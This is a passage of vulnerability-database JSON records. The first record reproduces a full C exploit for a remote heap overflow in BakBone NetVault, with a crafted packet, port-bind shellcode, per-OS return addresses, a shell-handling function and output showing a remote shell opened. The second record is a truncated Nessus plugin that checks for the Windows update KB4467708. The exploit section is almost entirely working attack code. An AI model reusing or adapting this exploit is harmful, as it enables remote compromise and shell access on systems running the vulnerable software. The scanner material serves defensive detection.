closed.\\n\");\r\n\t\t\tWSACleanup();\r\n\t\t\treturn;\r\n\t\t}\r\n\t}\r\n}\r\n\r\n}\r\n/*********************************************************************************/\r\nlong gimmeip(char *hostname) \r\n{\r\n\tstruct hostent *he;\r\n\tlong ipaddr;\r\n\t\r\n\tif ((ipaddr = inet_addr(hostname)) < 0) \r\n\t{\r\n\t\tif ((he = gethostbyname(hostname)) == NULL) \r\n\t\t{\r\n\t\t\tprintf(\"[x] Failed to resolve host: %s! Exiting...\\n\\n\",hostname);\r\n\t\t\tWSACleanup();\r\n\t\t\texit(1);\r\n\t\t}\r\n\t\tmemcpy(&ipaddr, he->h_addr, he->h_length);\r\n\t}\t\r\n\treturn ipaddr;\r\n}\r\n/*********************************************************************************/\r\n\r\n\n# 0day.today [2016-04-20] #", "published": "2005-05-17T00:00:00", "references": [], "reporter": "nolimit", "modified": "2005-05-17T00:00:00", "href": "http://0day.today/exploit/description/8567"}, "lastseen": "2016-04-20T01:21:24", "edition": 1, "differentElements": ["sourceHref", "sourceData", "href"]}], "objectVersion": "1.3", "cvelist": [], "sourceData": "====================================================\r\nBakBone NetVault 6.x/7.x Remote Heap Buffer Overflow\r\n====================================================\r\n\r\n/* Bakbone Netvault heap overflow exploit. \r\nSoftware Hole discovered by BuzzDee\r\nPOC written by nolimit and BuzzDee.\r\n\r\nAs class101 has already shown, this application has a lot of holes. \r\nThis is another remote heap overflow. This was tested on the demo version\r\nof netvault. We considered mailing the vendor on this one, but figured we'd recieve\r\nthe same response class did, which was none. So perhaps a second critical vulnerabilty\r\nwill wake Bakbone up to their software faults. \r\n\r\nA note to skiddies about this exploit\r\nThis won't really net you a lot of elite b0xes because class101's isn't patched,\r\n so it's just as vulnerable as this. Not to mention the fact that not many businesses\r\n use this software anyway.\r\n ..Maybe it's because of all the holes??\r\n\r\nThx to Flare, AceHigh, Shift,class101, and of course BuzzDee.\r\nSorry.. everyone wants to be famous :)\r\n\r\n\r\n C:\\CODING\\c++\\netvault\\Release>netvault 1 2KVM\r\n[*] Target: 2KVM Port: 20031\r\n\r\nTargetting 2K..\r\n[*] Socket initialized...\r\n[*] Sending buffer.\r\n[*] Sleeping..............\r\n[*] Connecting again to trigger overflow..\r\n[*] Connecting to host: 2KVM on port 101\r\n[*] Exploit worked! dropping into shell\r\nMicrosoft Windows 2000 [Version 5.00.2195]\r\n(C) Copyright 1985-2000 Microsoft Corp.\r\n\r\nC:\\Program Files\\BakBone Software\\NetVault>\r\n[email\u00a0protected]\r\n*/\r\n#include <stdio.h>\r\n#include <string.h>\r\n#include <io.h>\r\n#include <winsock.h>\r\n#pragma comment(lib,\"ws2_32\")\r\n\r\nvoid cmdshell (int sock);\r\nlong gimmeip(char *hostname);\r\nchar buffer[40000];\r\n//initial request to host\r\nchar packet[]=\r\n\"\\x00\\x00\\x02\\x01\\x00\\x00\\x00\\x8F\\xD0\\xF0\\xCA\\x0B\\x00\\x00\\x00\\x69\"\r\n\"\\x3B\\x62\\x3B\\x6F\\x3B\\x6F\\x3B\\x7A\\x3B\\x00\\x11\\x57\\x3C\\x42\\x00\\x01\"\r\n\"\\xB9\\xF9\\xA2\\xC8\\x00\\x00\\x00\\x00\\x03\\x00\\x00\\x00\\x00\\x01\\xA5\\x97\"\r\n\"\\xF0\\xCA\\x05\\x00\\x00\\x00\\x6E\\x33\\x32\\x3B\\x00\\x20\\x00\\x00\\x00\\x10\"\r\n\"\\x02\\x4E\\x3F\\xAC\\x14\\xCC\\x0A\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\"\r\n\"\\xA5\\x97\\xF0\\xCA\\x05\\x00\\x00\\x00\\x6E\\x33\\x32\\x3B\\x00\\x20\\x00\\x00\"\r\n\"\\x00\\x10\\x02\\x4E\\x3F\\xC0\\xA8\\xEA\\xEB\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n\"\\x00\\x01\\xA5\\x97\\xF0\\xCA\\x05\\x00\\x00\\x00\\x6E\\x33\\x32\\x3B\\x00\\x20\"\r\n\"\\x00\\x00\\x00\\x10\\x02\\x4E\\x3F\\xC2\\x97\\x2C\\xD3\\x00\\x00\\x00\\x00\\x00\"\r\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n\"\\x00\\x00\\x00\\xB9\\xF9\\xA2\\xC8\\x02\\x02\\x00\\x00\\x00\\xA5\\x97\\xF0\\xCA\"\r\n\"\\x05\\x00\\x00\\x00\\x6E\\x33\\x32\\x3B\\x00\\x20\\x00\\x00\\x00\\x04\\x02\\x4E\"\r\n\"\\x3F\\xAC\\x14\\xCC\\x0A\\xB0\\xFC\\xE2\\x00\\x00\\x00\\x00\\x00\\xEC\\xFA\\x8E\"\r\n\"\\x01\\xA4\\x6B\\x41\\x00\\xE4\\xFA\\x8E\\x01\\xFF\\xFF\\xFF\\xFF\\x01\\x02\";\r\n//class101 modified shellcode from metasploit.com. yummy.\r\nchar shellcode[]=\r\n\t\"\\x33\\xC9\\x83\\xE9\\xAF\\xD9\\xEE\\xD9\\x74\\x24\\xF4\\x5B\\x81\\x73\\x13\\xBB\"\r\n\t\"\\x1E\\xD3\\x6A\\x83\\xEB\\xFC\\xE2\\xF4\\x47\\x74\\x38\\x25\\x53\\xE7\\x2C\\x95\"\r\n\t\"\\x44\\x7E\\x58\\x06\\x9F\\x3A\\x58\\x2F\\x87\\x95\\xAF\\x6F\\xC3\\x1F\\x3C\\xE1\"\r\n\t\"\\xF4\\x06\\x58\\x35\\x9B\\x1F\\x38\\x89\\x8B\\x57\\x58\\x5E\\x30\\x1F\\x3D\\x5B\"\r\n\t\"\\x7B\\x87\\x7F\\xEE\\x7B\\x6A\\xD4\\xAB\\x71\\x13\\xD2\\xA8\\x50\\xEA\\xE8\\x3E\"\r\n\t\"\\x9F\\x36\\xA6\\x89\\x30\\x41\\xF7\\x6B\\x50\\x78\\x58\\x66\\xF0\\x95\\x8C\\x76\"\r\n\t\"\\xBA\\xF5\\xD0\\x46\\x30\\x97\\xBF\\x4E\\xA7\\x7F\\x10\\x5B\\x7B\\x7A\\x58\\x2A\"\r\n\t\"\\x8B\\x95\\x93\\x66\\x30\\x6E\\xCF\\xC7\\x30\\x5E\\xDB\\x34\\xD3\\x90\\x9D\\x64\"\r\n\t\"\\x57\\x4E\\x2C\\xBC\\x8A\\xC5\\xB5\\x39\\xDD\\x76\\xE0\\x58\\xD3\\x69\\xA0\\x58\"\r\n\t\"\\xE4\\x4A\\x2C\\xBA\\xD3\\xD5\\x3E\\x96\\x80\\x4E\\x2C\\xBC\\xE4\\x97\\x36\\x0C\"\r\n\t\"\\x3A\\xF3\\xDB\\x68\\xEE\\x74\\xD1\\x95\\x6B\\x76\\x0A\\x63\\x4E\\xB3\\x84\\x95\"\r\n\t\"\\x6D\\x4D\\x80\\x39\\xE8\\x4D\\x90\\x39\\xF8\\x4D\\x2C\\xBA\\xDD\\x76\\xD3\\x0F\"\r\n\t\"\\xDD\\x4D\\x5A\\x8B\\x2E\\x76\\x77\\x70\\xCB\\xD9\\x84\\x95\\x6D\\x74\\xC3\\x3B\"\r\n\t\"\\xEE\\xE1\\x03\\x02\\x1F\\xB3\\xFD\\x83\\xEC\\xE1\\x05\\x39\\xEE\\xE1\\x03\\x02\"\r\n\t\"\\x5E\\x57\\x55\\x23\\xEC\\xE1\\x05\\x3A\\xEF\\x4A\\x86\\x95\\x6B\\x8D\\xBB\\x8D\"\r\n\t\"\\xC2\\xD8\\xAA\\x3D\\x44\\xC8\\x86\\x95\\x6B\\x78\\xB9\\x0E\\xDD\\x76\\xB0\\x07\"\r\n\t\"\\x32\\xFB\\xB9\\x3A\\xE2\\x37\\x1F\\xE3\\x5C\\x74\\x97\\xE3\\x59\\x2F\\x13\\x99\"\r\n\t\"\\x11\\xE0\\x91\\x47\\x45\\x5C\\xFF\\xF9\\x36\\x64\\xEB\\xC1\\x10\\xB5\\xBB\\x18\"\r\n\t\"\\x45\\xAD\\xC5\\x95\\xCE\\x5A\\x2C\\xBC\\xE0\\x49\\x81\\x3B\\xEA\\x4F\\xB9\\x6B\"\r\n\t\"\\xEA\\x4F\\x86\\x3B\\x44\\xCE\\xBB\\xC7\\x62\\x1B\\x1D\\x39\\x44\\xC8\\xB9\\x95\"\r\n\t\"\\x44\\x29\\x2C\\xBA\\x30\\x49\\x2F\\xE9\\x7F\\x7A\\x2C\\xBC\\xE9\\xE1\\x03\\x02\" \r\n\t\"\\x54\\xD0\\x33\\x0A\\xE8\\xE1\\x05\\x95\\x6B\\x1E\\xD3\\x6A\";\r\n\r\nchar jmpToXP[]=\"\\xBD\\x9B\\x36\\x7C\"; //XP SP1\r\nchar uefOverWriteXP[]=\"\\xB4\\x73\\xED\\x77\";//XP SP1\r\nchar jmpTo2K[]=\"\\x7E\\x6D\\x03\\x75\"; //2k SP4\r\nchar uefOverWrite2K[]=\"\\x4C\\x14\\x54\\x7C\"; //2K SP4\r\n\r\nint main(int argc,char *argv[])\r\n{ \r\n\t\tWSADATA wsaData;\r\n\t\tstruct sockaddr_in targetTCP;\r\n\t\tint sockTCP,s;\r\n\t\tunsigned short port = 20031;\r\n\t\tlong ip;\r\n\t\tif(argc < 3)\r\n\t\t{\r\n\t\t\t\r\n\t\t\tprintf(\"Bakbone Netvault Remote Heap Overflow.\\n\"\r\n\t\t\t\t\"Usage: %s [Target] [address] <port>\\n\"\r\n\t\t\t\t\" eg: netvault.exe 1 127.0.0.1\\n\"\r\n\t\t\t\t\"Targets\\n1. Windows 2000\\n2. Windows XP SP0-1\\n\"\r\n\t\t\t\t\t\"Coded by [email\u00a0protected] and BuzzDee.\\n\",argv[0]);\r\n\t\t\treturn 1;\t\t\t\r\n\t\t}\t\t\r\n\t\tif(argc==4)\r\n\t\t\tport = atoi(argv[3]);\t\t\t\t\t\r\n WSAStartup(0x0202, &wsaData);\t\t\t\t\r\n\t\tprintf(\"[*] Target:\\t%s \\tPort: %d\\n\\n\",argv[2],port);\r\n\t\tip=gimmeip(argv[2]);\t\r\n targetTCP.sin_family = AF_INET;\r\n targetTCP.sin_addr.s_addr = ip;\r\n targetTCP.sin_port = htons(port);\r\n\t\tmemset(buffer,'\\x90',40000);\r\n\t\tmemcpy(buffer,packet,sizeof(packet)-1); //request packet\r\n\t\tmemcpy(buffer+32790,\"\\xEB\\x0C\",2); //JMP ahead over the 2 overwrites\r\n\t\tswitch(atoi(argv[1]))\r\n\t\t{\r\n\t\t\tcase 1:\r\n\t\t\tprintf(\"Targetting 2K..\\n\");\r\n\t\t\tmemcpy(buffer+32792,jmpTo2K,sizeof(jmpTo2K)-1); //overwrite pointer to CALL [EDI+74]\r\n\t\t\tmemcpy(buffer+32796,uefOverWrite2K,sizeof(uefOverWrite2K)-1); //UEF as chosen.\r\n\t\t\tbreak;\r\n\t\t\tcase 2:\r\n\t\t\tprintf(\"Targetting XP..\\n\");\r\n\t\t\tmemcpy(buffer+32792,jmpToXP,sizeof(jmpToXP)-1); //overwrite pointer to CALL [EDI+74]\r\n\t\t\tmemcpy(buffer+32796,uefOverWriteXP,sizeof(uefOverWriteXP)-1); //UEF as chosen.\r\n\t\t\tbreak;\r\n\t\t\tdefault:\r\n\t\t\tprintf(\"Error target not found.\\n\");\r\n\t\t\treturn 1;\r\n\t\t\tbreak;\r\n\t\t}\r\n\t\tmemcpy(buffer+32820,shellcode,sizeof(shellcode)-1); //101 portbind thx class101/metasploit ;p\r\n\t\tmemcpy(buffer+39947,\"\\x00\\x00\\x00\",3); //all done! only 39950 bytes! ;P\r\n\t\tif ((sockTCP = socket(AF_INET, SOCK_STREAM, 0)) == -1)\r\n\t\t{\r\n\t\t\t\tprintf(\"[x] Socket not initialized! Exiting...\\n\");\r\n\t\t\t\tWSACleanup();\r\n return 1;\r\n\t\t}\r\n\t\tprintf(\"[*] Socket initialized...\\n\");\t\t\t\t\t\r\n\t\tif(connect(sockTCP,(struct sockaddr *)&targetTCP, sizeof(targetTCP)) != 0)\r\n\t\t{\r\n\t\t\tprintf(\"[*] Connection to host failed! Exiting...\\n\");\r\n\t\t\tWSACleanup();\r\n\t\t\texit(1);\r\n\t\t} \t\t\r\n\t\tprintf(\"[*] Sending buffer.\\n\");\r\n\t\tSleep(1000);\r\n\t\tif (send(sockTCP, buffer, 39950,0) == -1)\r\n\t\t{\r\n\t\t\t\tprintf(\"[x] Failed to inject packet! Exiting...\\n\");\r\n\t\t\t\tWSACleanup();\r\n return 1;\r\n\t\t}\t\t\r\n\t\tprintf(\"[*] Sleeping.\");\r\n\t\tfor(s=0;s<8;s++)\r\n\t\t{ //wait for it to catch\r\n\t\t\tprintf(\".\");\r\n\t\t\tSleep(500);\r\n\t\t}\r\n\t\tclosesocket(sockTCP);\r\n\t\tfor(s=0;s<5;s++)\r\n\t\t{\r\n\t\t\tprintf(\".\");\r\n\t\t\tSleep(500);\r\n\t\t} //exploit triggers when you reconnect sometimes\r\n\t\tprintf(\"\\n[*] Connecting again to trigger overflow..\\n\");\r\n\t\tif ((sockTCP = socket(AF_INET, SOCK_STREAM, 0)) == -1)\r\n\t\t{ \r\n\t\t\t\tprintf(\"[x] Socket not initialized! Exiting...\\n\");\r\n\t\t\t\tWSACleanup();\r\n return 1;\r\n\t\t}\r\n\t\tif(connect(sockTCP,(struct sockaddr *)&targetTCP, sizeof(targetTCP)) != 0)\r\n\t\t{\r\n\t\t\tprintf(\"[*] Connection to host failed! Exiting...\\n\");\r\n\t\t\tWSACleanup();\r\n\t\t\texit(1);\r\n\t\t} \t\t\r\n\t\tSleep(500);\r\n\t\tclosesocket(sockTCP);\r\n\t\t\t\t\r\n\t\tprintf(\"[*] Connecting to host: %s on port 101\\n\",argv[2]);\r\n\t\tif ((sockTCP = socket(AF_INET, SOCK_STREAM, 0)) == -1)\r\n\t\t{\r\n\t\t\t\tprintf(\"[x] Socket not initialized! Exiting...\\n\");\r\n\t\t\t\tWSACleanup();\r\n return 1;\r\n\t\t}\r\n\t\ttargetTCP.sin_port= htons(101);\r\n\t\tif(connect(sockTCP,(struct sockaddr *)&targetTCP, sizeof(targetTCP)) != 0)\r\n\t\t{\r\n\t\t\tprintf(\"[*] Connection to host failed! Exiting...\\n\");\r\n\t\t\tWSACleanup();\r\n\t\t\texit(1);\r\n\t\t} \t\t\r\n\t\tprintf(\"[*] Exploit worked! dropping into shell\\n\");\r\n\t\tcmdshell(sockTCP);\r\n\t\tWSACleanup();\r\n\t\texit(1);\r\n\t\treturn 0;\r\n}\r\n/*\r\nTaken from some random exploit.\r\ngood, simple cmdshell function.\r\n*/\r\nvoid cmdshell (int sock)\r\n{\r\n struct timeval tv;\r\n int length;\r\n unsigned long o[2];\r\n char buffer[1000];\r\n \r\n tv.tv_sec = 1;\r\n tv.tv_usec = 0;\r\n\r\n while (1) \r\n {\r\n\to[0] = 1;\r\n\to[1] = sock;\t\r\n\r\n\tlength = select (0, (fd_set *)&o, NULL, NULL, &tv);\r\n\tif(length == 1)\r\n\t{\r\n\t\tlength = recv (sock, buffer, sizeof (buffer), 0);\r\n\t\tif (length <= 0) \r\n\t\t{\r\n\t\t\tprintf (\"[x] Connection closed.\\n\");\r\n\t\t\tWSACleanup();\r\n\t\t\treturn;\r\n\t\t}\r\n\t\tlength = write (1, buffer, length);\r\n\t\tif (length <= 0) \r\n\t\t{\r\n\t\t\tprintf (\"[x] Connection closed.\\n\");\r\n\t\t\tWSACleanup();\r\n\t\t\treturn;\r\n\t\t}\r\n\t}\r\n\telse\r\n\t{\r\n \tlength = read (0, buffer, sizeof (buffer));\r\n\t\tif (length <= 0) \r\n\t\t{\r\n\t\t\tprintf(\"[x] Connection closed.\\n\");\r\n\t\t\tWSACleanup();\r\n\t\t\treturn;\r\n\t\t}\r\n\t\tlength = send(sock, buffer, length, 0);\r\n\t\tif (length <= 0) \r\n\t\t{\r\n\t\t\tprintf(\"[x] Connection closed.\\n\");\r\n\t\t\tWSACleanup();\r\n\t\t\treturn;\r\n\t\t}\r\n\t}\r\n}\r\n\r\n}\r\n/*********************************************************************************/\r\nlong gimmeip(char *hostname) \r\n{\r\n\tstruct hostent *he;\r\n\tlong ipaddr;\r\n\t\r\n\tif ((ipaddr = inet_addr(hostname)) < 0) \r\n\t{\r\n\t\tif ((he = gethostbyname(hostname)) == NULL) \r\n\t\t{\r\n\t\t\tprintf(\"[x] Failed to resolve host: %s! Exiting...\\n\\n\",hostname);\r\n\t\t\tWSACleanup();\r\n\t\t\texit(1);\r\n\t\t}\r\n\t\tmemcpy(&ipaddr, he->h_addr, he->h_length);\r\n\t}\t\r\n\treturn ipaddr;\r\n}\r\n/*********************************************************************************/\r\n\r\n\n# 0day.today [2018-01-01] #", "published": "2005-05-17T00:00:00", "references": [], "reporter": "nolimit", "modified": "2005-05-17T00:00:00", "href": "https://0day.today/exploit/description/8567"}
{"nessus": [{"lastseen": "2019-11-03T12:16:31", "bulletinFamily": "scanner", "description": "The remote Windows host is missing security update 4467708.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A security feature bypass vulnerability exists in\n Microsoft JScript that could allow an attacker to bypass\n Device Guard. (CVE-2018-8417)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2018-8552)\n\n - An elevation of privilege vulnerability exists when\n DirectX improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in kernel mode. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2018-8485, CVE-2018-8554, CVE-2018-8561)\n\n - A remote code execution vulnerability exists when\n PowerShell improperly handles specially crafted files.\n An attacker who successfully exploited this\n vulnerability could execute malicious code on a\n vulnerable system. (CVE-2018-8256)\n\n - A security feature bypass exists when Windows\n incorrectly validates kernel driver signatures. An\n attacker who successfully exploited this vulnerability\n could bypass security features and load improperly\n signed drivers into the kernel. In an attack scenario,\n an attacker could bypass security features intended to\n prevent improperly signed drivers from being loaded by\n the kernel. The update addresses the vulnerability by\n correcting how Windows validates kernel driver\n signatures. (CVE-2018-8549)\n\n - An information disclosure vulnerability exists in the\n way that Microsoft Edge handles cross-origin requests.\n An attacker who successfully exploited this\n vulnerability could determine the origin of all webpages\n in the affected browser. (CVE-2018-8545)\n\n - A tampering vulnerability exists in PowerShell that\n could allow an attacker to execute unlogged code.\n (CVE-2018-8415)\n\n - A remote code execution vulnerability exists in the way\n that Windows Deployment Services TFTP Server handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute arbitrary code\n with elevated permissions on a target system.\n (CVE-2018-8476)\n\n - An elevation of privilege vulnerability exists in\n Windows 10 version 1809 when installed from physical\n media (USB, DVD, etc.) with the keep nothing option\n selected during installation. Successful exploitation of\n the vulnerability could allow an attacker to gain local\n access to an affected system. (CVE-2018-8592)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2018-8544)\n\n - An elevation of privilege vulnerability exists when\n Windows improperly handles calls to Advanced Local\n Procedure Call (ALPC). An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n the security context of the local system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2018-8584)\n\n - An elevation of privilege exists in Windows COM\n Aggregate Marshaler. An attacker who successfully\n exploited the vulnerability could run arbitrary code\n with elevated privileges. (CVE-2018-8550)\n\n - An information disclosure vulnerability exists when\n Windows Audio Service fails to properly handle objects\n in memory. An attacker who successfully exploited the\n vulnerability could potentially disclose memory contents\n of a elevated process. (CVE-2018-8454)\n\n - A spoofing vulnerability exists when Microsoft Edge\n improperly handles specific HTML content. An attacker\n who successfully exploited this vulnerability could\n trick a user into believing that the user was on a\n legitimate website. The specially crafted website could\n either spoof content or serve as a pivot to chain an\n attack with other vulnerabilities in web services.\n (CVE-2018-8564)\n\n - A cross-site-scripting (XSS) vulnerability exists when\n an open source customization for Microsoft Active\n Directory Federation Services (AD FS) does not properly\n sanitize a specially crafted web request to an affected\n AD FS server. An authenticated attacker could exploit\n the vulnerability by sending a specially crafted request\n to an affected AD FS server. The attacker who\n successfully exploited the vulnerability could then\n perform cross-site scripting attacks on affected systems\n and run scripts in the security context of the current\n user. The attacks could allow the attacker to read\n content that the attacker is not authorized to read, use\n the victim", "modified": "2019-11-02T00:00:00", "id": "SMB_NT_MS18_NOV_4467708.NASL", "href": "https://www.tenable.com/plugins/nessus/122820", "published": "2019-03-13T00:00:00", "title": "KB4467708: Windows 10 Version 1809 and Windows Server 2019 November 2018 Security Update", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(122820);\n script_version(\"1.2\");\n script_cvs_date(\"Date: 2019/04/02 21:54:17\");\n\n script_cve_id(\n \"CVE-2018-8256\",\n \"CVE-2018-8407\",\n \"CVE-2018-8415\",\n \"CVE-2018-8417\",\n \"CVE-2018-8454\",\n \"CVE-2018-8471\",\n \"CVE-2018-8476\",\n \"CVE-2018-8485\",\n \"CVE-2018-8541\",\n \"CVE-2018-8542\",\n \"CVE-2018-8543\",\n \"CVE-2018-8544\",\n \"CVE-2018-8545\",\n \"CVE-2018-8547\",\n \"CVE-2018-8549\",\n \"CVE-2018-8550\",\n \"CVE-2018-8551\",\n \"CVE-2018-8552\",\n \"CVE-2018-8554\",\n \"CVE-2018-8555\",\n \"CVE-2018-8556\",\n \"CVE-2018-8557\",\n \"CVE-2018-8561\",\n \"CVE-2018-8562\",\n \"CVE-2018-8564\",\n \"CVE-2018-8567\",\n \"CVE-2018-8584\",\n \"CVE-2018-8588\",\n \"CVE-2018-8592\"\n );\n script_bugtraq_id(\n 105770,\n 105771,\n 105772,\n 105773,\n 105774,\n 105775,\n 105779,\n 105780,\n 105781,\n 105782,\n 105784,\n 105785,\n 105786,\n 105787,\n 105788,\n 105790,\n 105792,\n 105794,\n 105795,\n 105799,\n 105800,\n 105801,\n 105803,\n 105805,\n 105808,\n 105809,\n 105811,\n 105813,\n 105846\n );\n script_xref(name:\"MSKB\", value:\"4467708\");\n script_xref(name:\"MSFT\", value:\"MS18-4467708\");\n\n script_name(english:\"KB4467708: Windows 10 Version 1809 and Windows Server 2019 November 2018 Security Update\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4467708.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A security feature bypass vulnerability exists in\n Microsoft JScript that could allow an attacker to bypass\n Device Guard. (CVE-2018-8417)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2018-8552)\n\n - An elevation of privilege vulnerability exists when\n DirectX improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in kernel mode. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2018-8485, CVE-2018-8554, CVE-2018-8561)\n\n - A remote code execution vulnerability exists when\n PowerShell improperly handles specially crafted files.\n An attacker who successfully exploited this\n vulnerability could execute malicious code on a\n vulnerable system. (CVE-2018-8256)\n\n - A security feature bypass exists when Windows\n incorrectly validates kernel driver signatures. An\n attacker who successfully exploited this vulnerability\n could bypass security features and load improperly\n signed drivers into the kernel. In an attack scenario,\n an attacker could bypass security features intended to\n prevent improperly signed drivers from being loaded by\n the kernel. The update addresses the vulnerability by\n correcting how Windows validates kernel driver\n signatures. (CVE-2018-8549)\n\n - An information disclosure vulnerability exists in the\n way that Microsoft Edge handles cross-origin requests.\n An attacker who successfully exploited this\n vulnerability could determine the origin of all webpages\n in the affected browser. (CVE-2018-8545)\n\n - A tampering vulnerability exists in PowerShell that\n could allow an attacker to execute unlogged code.\n (CVE-2018-8415)\n\n - A remote code execution vulnerability exists in the way\n that Windows Deployment Services TFTP Server handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute arbitrary code\n with elevated permissions on a target system.\n (CVE-2018-8476)\n\n - An elevation of privilege vulnerability exists in\n Windows 10 version 1809 when installed from physical\n media (USB, DVD, etc.) with the keep nothing option\n selected during installation. Successful exploitation of\n the vulnerability could allow an attacker to gain local\n access to an affected system. (CVE-2018-8592)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2018-8544)\n\n - An elevation of privilege vulnerability exists when\n Windows improperly handles calls to Advanced Local\n Procedure Call (ALPC). An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n the security context of the local system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2018-8584)\n\n - An elevation of privilege exists in Windows COM\n Aggregate Marshaler. An attacker who successfully\n exploited the vulnerability could run arbitrary code\n with elevated privileges. (CVE-2018-8550)\n\n - An information disclosure vulnerability exists when\n Windows Audio Service fails to properly handle objects\n in memory. An attacker who successfully exploited the\n vulnerability could potentially disclose memory contents\n of a elevated process. (CVE-2018-8454)\n\n - A spoofing vulnerability exists when Microsoft Edge\n improperly handles specific HTML content. An attacker\n who successfully exploited this vulnerability could\n trick a user into believing that the user was on a\n legitimate website. The specially crafted website could\n either spoof content or serve as a pivot to chain an\n attack with other vulnerabilities in web services.\n (CVE-2018-8564)\n\n - A cross-site-scripting (XSS) vulnerability exists when\n an open source customization for Microsoft Active\n Directory Federation Services (AD FS) does not properly\n sanitize a specially crafted web request to an affected\n AD FS server. An authenticated attacker could exploit\n the vulnerability by sending a specially crafted request\n to an affected AD FS server. The attacker who\n successfully exploited the vulnerability could then\n perform cross-site scripting attacks on affected systems\n and run scripts in the security context of the current\n user. The attacks could allow the attacker to read\n content that the attacker is not authorized to read, use\n the victim's identity to take actions on the AD FS site\n on behalf of the user, such as change permissions and\n delete content, and inject malicious content in the\n browser of the user. The security update addresses the\n vulnerability by helping to ensure that the open source\n customization for AD FS properly sanitizes web requests.\n (CVE-2018-8547)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2018-8562)\n\n - An information disclosure vulnerability exists when\n "Kernel Remote Procedure Call Provider" driver\n improperly initializes objects in memory.\n (CVE-2018-8407)\n\n - An elevation of privilege vulnerability exists in the\n way that the Microsoft RemoteFX Virtual GPU miniport\n driver handles objects in memory. An attacker who\n successfully exploited the vulnerability could execute\n code with elevated permissions. (CVE-2018-8471)\n\n - A remote code execution vulnerability exists in the way\n that the Chakra scripting engine handles objects in\n memory in Microsoft Edge. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. An attacker who successfully exploited the\n vulnerability could gain the same user rights as the\n current user. (CVE-2018-8541, CVE-2018-8542,\n CVE-2018-8543, CVE-2018-8551, CVE-2018-8555,\n CVE-2018-8556, CVE-2018-8557, CVE-2018-8588)\n\n - An elevation of privilege vulnerability exists when\n Microsoft Edge does not properly enforce cross-domain\n policies, which could allow an attacker to access\n information from one domain and inject it into another\n domain. (CVE-2018-8567)\");\n # https://support.microsoft.com/en-us/help/4467708/windows-10-update-kb4467708\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?23874593\");\n script_set_attribute(attribute:\"solution\", value:\n \"Apply Cumulative Update KB4467708.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-8476\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/11/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/11/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/03/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate 